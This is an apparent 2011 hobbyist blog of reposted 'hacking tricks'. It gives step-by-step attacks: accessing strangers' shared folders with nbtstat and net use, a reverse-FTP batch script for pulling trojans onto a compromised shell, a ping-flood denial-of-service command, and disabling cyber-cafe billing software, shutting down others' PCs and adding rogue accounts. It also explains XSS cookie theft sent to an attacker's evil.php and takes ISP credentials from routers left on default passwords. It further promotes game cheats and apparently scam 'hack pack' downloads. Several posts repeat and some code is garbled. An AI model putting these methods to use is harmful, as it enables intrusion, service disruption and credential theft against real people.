
Saturday, August 20, 2011

Add Google Talk To Your Blog

Google Talk, long a fixture in Gmail, can now be added to your blog as a gadget.

The Google Talk Gadget lets you send instant messages, transfer files, make voice calls (to other Google Talk users) and leave voicemail messages. If you paste a Picasa Web Album or YouTube URL into a chat session, the gadget gives you an instant preview of the photos and videos.

use that link....>>><iframe%20width%3D"234"%20frameborder%3D"0"%20src%3D""%20height%3D"350"><%2Fiframe><p%20style%3D"margin%3A-8px%200">%26nbsp%3B<a%20style%3D"font-size%3A60%25%3Btext-decoration%3Anone"%20href%3D"">Add%20To%20My%20Blog<%2Fa><%2Fp>

Monday, August 15, 2011

Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt


Nbtstat -A 

[e.g: nbtstat -A]

This will give you a read out that looks like this

NetBIOS Remote Machine Name Table
Name Type Status
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered

The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Net view \\

[e.g : net view \\]

You will then get a response that looks something like this.

Shared resources at \\ip_address
Sharename Type Comment

(The command was completed successfully.)

Net use x: \\\temp

[e.g : net use x: \\\temp]

If all goes well for you, you will then get a response of

(The command was completed successfully.)

Open my computer you will see your victim's temp folder there

reffered by realm-of-tricks

How to Reverse FTP with command prompt

Wanna upload files to a remote computer? (trojans ect.)

well , reverse ftp'ing :

i explain it in few steps :

1 - configure a good ftp server on your pc and run it
2 - choice good username and password for your ftp server
3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory
4 - in hacked command shell enter the following commands :

echo off
echo open>transfer.txt ;put your IP
echo your-user-name>>transfer.txt ;for your ftp server
echo your-password>>transfer.txt ;for your ftp server
echo get file1.exe>>transfer.txt ; any file or trojan to upload
echo get file2.exe>>transfer.txt ; any file or trojan to upload
.... ; may be continued as needed
.... ; may be continued as needed
echo quit >>transfer.txt ; end of uploading transfer

ftp -s:transfer.txt ; ftp'ing script

reffered by realm-of-tricks

How To Send DoS Attack With CMD

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

DoS Attack Stands For Denial of Service Attack
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

No problem.. here is the solution..
open ur CMD (command prompt).. and type
nslookup Site-Name 
(e.g nslookup

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

This All System Is Known As "PING OF DEATH"

------------->> This Tutrial Is Made By _FlopAdmi_ For Educational Purposes Only!! <<------------------

Download Tutrial:

reffered by realm-of-tricks

hacking cyber cafe

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.

For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.

Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.

Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.

Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

reffered by realm-of-tricks

Cookie Stealing for phun and profit

[root@Athleone] ~
$ cat cookiestealing.txt

Cookie Stealing
Written by Athleone(or D4T4_L33CH)
0x10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user's cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people's cookies.

This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.

0x20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let's start off with something simple. Type this into the guestbook:

Okay, now that's done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn't work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like "You guyssuck." and see if the "suck" comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
Now, imagine what the HTML for the image would be like...

so they add a "> at the back, which means we can do this:
(start URL here)

0x40 The Stealing 
But once the luser goes to the site, what do you do then? "Hey, tell me all that info in that suspicious looking text box please?" Yeah right. 
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like, although you will be breaking the rules in their TOS...) and make a new file. In the new file, type in this: 

Code :- 

=$_GET['stuff'] . "\n"

Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as "Cookie Stealer Phile (Newline here)". Alright, now you have to change the script that you put into the vulnerable site. Change it to

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!

reffered by realm-of-tricks

Chat with command prompt

If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
Message: Hi
Now all you need to do is press "Enter", and start chatting!

reffered by realm-of-tricks

Chat within Lan Network

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:


After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

Message: Hi

Now all you need to do is press "Enter", and start chatting!

reffered by realm-of-tricks

Chat within Lan Network

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:


After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

Message: Hi

Now all you need to do is press "Enter", and start chatting!

reffered by realm-of-tricks

How to Reverse FTP with command prompt

Wanna upload files to a remote computer? (trojans ect.)

well , reverse ftp'ing :

i explain it in few steps :

1 - configure a good ftp server on your pc and run it
2 - choice good username and password for your ftp server
3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory
4 - in hacked command shell enter the following commands :

echo off
echo open>transfer.txt ;put your IP
echo your-user-name>>transfer.txt ;for your ftp server
echo your-password>>transfer.txt ;for your ftp server
echo get file1.exe>>transfer.txt ; any file or trojan to upload
echo get file2.exe>>transfer.txt ; any file or trojan to upload
.... ; may be continued as needed
.... ; may be continued as needed
echo quit >>transfer.txt ; end of uploading transfer

ftp -s:transfer.txt ; ftp'ing script

reffered by realm-of-tricks

Bypass Internet Censorship

I remember not so long ago someone was asking about ways to get around and view sites that were blocked by the administrators, or some web filtering device, either at work or at school, hope this helps.

reffered by realm-of-tricks

ByPass All RS Ristrictions


___________________[About the Elephant:]___________________
-> This program will allow it's users to share share-sites links and also to download from these share-sites automatically!
-> Automatic Captcha reading.
-> Automatic IP-Switching.

[(E)lephant Now Supports Unlimited Downloads From:]
-. [Free/Premium Users!]
-. [Free Users!]

[size=18]Current Version:[/size]
-. Published on: 2007-12-25 04:30
-. Download from:

[Current Known Bugs:]
-. None Yet. :-)

[Current TODO List:]
-. add more plugins. (support more share sites downloads)
__. add premium support!

-. make a user panel for msgs/posts ++
__. ability to edit you're own posts...
__. do something with comments.

-. add updating abilities. (Temporary DecryptionCheck does it.)

[Current Ideas List:]
-. add a history tab
-. add suggested dls. (in browser tab)
-. add hotlist (searching).

this leacher only downloads the fist 50kb of the file and then changes ip and starts again!!
RS kiss my @$$

ByPass All RS Ristrictions - Shaify Mehta
Password Here :-

reffered by realm-of-tricks

Enter Any Website's Vip Section Without Password

This summary is not available. Please click here to view the post.

Hacking Password Protected Pages [With Pictures]

Easily Speed Up Your Bsnl Broadband

Tip 1: One of the major problems with BSNL Dataone Broadband connection is the DNS servers they provide by default. Most of the time they are very slow and sometimes they fail to respond. I noticed that I am starting to spend a significant amount of time in DNS resolution with Dataone connection, often it is larger than the time it takes to actually get the reponse. Here is a simple solution to significantly speed up your DNS resolution. Open up the network connection profile and edit TCP/IP settings. In the DNS server address fields, specify the following DNS server addresses: and
Disconnect the connection and then connect again. You are done. This specifies third party DNS servers which are significantly faster than BSNL Dataone’s DNS servers. Note: The service is provided by OpenDNS.

Tip 2Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience.

reffered by realm-of-tricks

Hack Your Broadband!!No Risk!

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password

Use Asterisk Key Software For Revelation Of Passwords.

reffered by realm-of-tricks

Call of Duty Black Ops NextGen MODBOX v2.0

What is Modbox?
ModBox is a simple tool used for BLACK OPS Modding. It is the only modding tool that can be used without a JTAG. So now almost everyone can mod on Black OPS. There is no need for a JTAG, Modded Xbox, or a Transfer Cable. Everything is done on the pc to the xbox 360. Get the latest version of ModBox on this page.

What’s New In Modbox 2.0?
Works with the new patch for online
-Simple Sleek GUI
-Now works with the New XBOX 360 Slim, PS3, Xbox 360, and PC
-79% faster than Modbox v1.0
-Added Money Mode and Super Jump Mods
-Better stealth to stay unbanned
-Faster Process and Speeds
-More added Features
-AntiBan & AntiLookup is added

reffered by realm-of-tricks

BLACK OPS HACK PACK V3.4 latest version till now

Hi Guys this hack is the best in all of the hacks :)
We know you’re looking for Black Ops Cheats for call of duty. If you’re excited to use these cheats online and become one of the highest ranked Black ops players, then please read below. There’s a few things you need to know about Black Ops Cheats and the Hack Pack Tool v3.3. Please keep reading..

Recently, we have discovered the black ops cheats hack pack v3.3 has been abused on live play. Immediately, our team decided we would place a human verifier in the download link to protect the bot from being linked in other places. This will ensure you are always using the best black ops cheats hackpack v3.3

I’m delighted to introduce you to Black Ops Cheats Hack Pack v3.3 and the four steps you need to follow for successful cheating online:

Systems Supported – Xbox360, PS3, PC, Wii

Systems Supported – Xbox360, PS3, PC, Wii

Custom Mods – UFO, no gravity, shotguns with camo, aimbot, hold 3 weapons, have 4 perks, have UAV on always, laser sight, nuke in package 100%, automatic everything, automatic shotguns, out of bounds barrier OFF, nuke requires 3 killstreak, Gold AK:47, unlock desert eagle, perfect aim

unlimited predator missles, exploding gunshots, auto reload, teleport, thermal sight, message appear on screen, floating objects, automatic m16, see through walls, money modes, vision, cartoon, matrix modes, super jump, super speed.

reffered by realm-of-tricks

How to increase your BitTorrent Speeds

although it doesn't really do much of a difference for me because it all depends on how many seeders/leechers are uploading, but here's how it works:

- an internet connection, must be high speed of course...
- Windows XP Professional or Windows 2003

**note** this trick will increase your bandwidth usage, if your Internet Service Provider (ISP) limits your bandwidth, I suggest that you don't do this trick...
This part will increase your bandwidth usage by 20% meaning, you will get a faster internet speed (or your full speed...). start run
3.type gpedit.msc
4.on the right hand side, press computer configuration administrative templates network QoS Packet Scheduler Limit reservable bandwidth will see it being set default as "not configured". You will now press "enable". Change the value from 20% to 0%. Pressing "disable" will result nothing.
10. press apply

now, a huge amount of people have been complaining over these past years that Windows XP Service Pack 2 has slowed their internet down. Service Pack 2 limits only 10 simultaneously incomplete outbound TCP connections, Service Pack 1 on the other hand, allows about 16777214 connections (or somewhere near there). The reason why Microsoft has limited to 10 connections only is to "prevent" worms/viruses from infecting your computer faster, this will therefore slow down your downloading speeds as well.

1.go download
2.if you have a crappy antivirus like Norton, or McAfee or AVG, changing it to 50 should be enough....
if you have good antivirus like NOD32, then you can freely change to 16777214 (that's what im using right now...)
3.If Windows pops up asking you to insert a Windows XP SP2 CD, press ignore.

although this won't have a significant improvement, but it's just changing the limits. And use uTorrent.

If you're thinking why you can't download using BitTorrent even if you have high speed, it's because your ISP is throttling your internet connection. I suggest you using uTorrent, and then on options---->preferences----->Bittorrent---->under protocol enryption, enable that, and you should see a higher speed than you have before...


How to Identify Fake Torrents

Did you know that MPAA and RIAA are always setting traps for pirates to get caught of downloading copyright materials? I didn't know that until I read one article from TorrentFreak. The anti-piracy organizations can easily trace you when they upload a very popular .torrent file to some popular torrent tracker site. When you download the .torrent file and load it, your bittorrent client will start connecting to the anti-piracy organizations trackers. That's when they record your IP address and can possible get in touch with you for downloading copyrighted materials!
This is a very scary trap because I know a lot of people who knows how to download from bittorrent but don't know anything about peer, leecher, tracker and etc... In short, they don't know how bittorrent works but they know that by waiting for days, the download will complete and they get what they want.

Here's how you can know if the Torrent or Tracker is fake.

Fenopy has created a Fake Finder page that lists the most popular fake torrents and the latest fake trackers. It also allows you to search for fake torrents by keyword or infohash.


jQuery Validator Plugin - File upload validation issue : Solved

Hi folks, have you had an issue in validating file upload with jQuery Validatior Plugin.
        rules: {
            myfile: {required: true,
                        accept: "png|jpg|gif|jpeg"
        messages: {myfile: "ERROR"    }

here it checks for file having jpg,png,gif,jpeg extension and it works. But the problem is the if we make a file with name 'foo_bar.1jpg', the validator will take this as a valid file also. Here their plug-in fails....

So i have modified the plug-in code so that it will take only having valid image extension.

Just replace the accept function in the jquery.validate.js to the below code,

accept: function(value, element, param) {
            var truncate = value.split(".");
            value = truncate[1];
            param = typeof param == "string" ? param.replace(/,/g, '|') : "png|jpe?g|gif";
            return this.optional(element) || value.match(new RegExp("^(" + param + ")$", "i"));

reffered by aravindisonline

Cheats for meez

Facebook Meez Hack Pack 2011

We proudly present new Meez Hack Pack to get unlimited coins money.

1. Log in to your Facebook account and go MEEZ application
2. Download and Run the MEEZ Cheat - hack tool
3. Enter stats amount you wanted to add
4. Click Start and wait until finish hacking

Now click this button to start downloading:

reffered by realm-of-tricks

habbo cheats codes

Habbo hack Pack
How to use:
STEP 1 - Download "Habbo pack " by clicking the Button Below
STEP 2 - Save this Habbo hack Tool on your desktop and open it.
STEP 3 - Enter Your Habbo Username and password. Select which amount you want to Hack and click on "Use HabboGeek Now" Button..
STEP 4 - Watch your coins grow
How to download
1. Click on the Download Button
2. On download page, Select 'Regular Download'. A survey will appear to verify that you are a human and not a bot.
3. Simply fill in a short free survey and then download the file.
4. When you've filled the survey, the download will start, just Save it to your desktop and do the instructions as explained above.

reffered by realm-of-tricks

Facebook Meez Hack Pack 2011

Facebook Meez Hack Pack 2011

We proudly present new Meez Hack Pack to get unlimited coins money.

1. Log in to your Facebook account and go MEEZ application
2. Download and Run the MEEZ Cheat - hack tool
3. Enter stats amount you wanted to add
4. Click Start and wait until finish hacking

Now click this button to start downloading:

Cheats for meez

cheats for meez 
Facebook Meez Hack Pack 2011

We proudly present new Meez Hack Pack to get unlimited coins money.

1. Log in to your Facebook account and go MEEZ application
2. Download and Run the MEEZ Cheat - hack tool
3. Enter stats amount you wanted to add
4. Click Start and wait until finish hacking

Now click this button to start downloading:

reffered by realm-of-tricks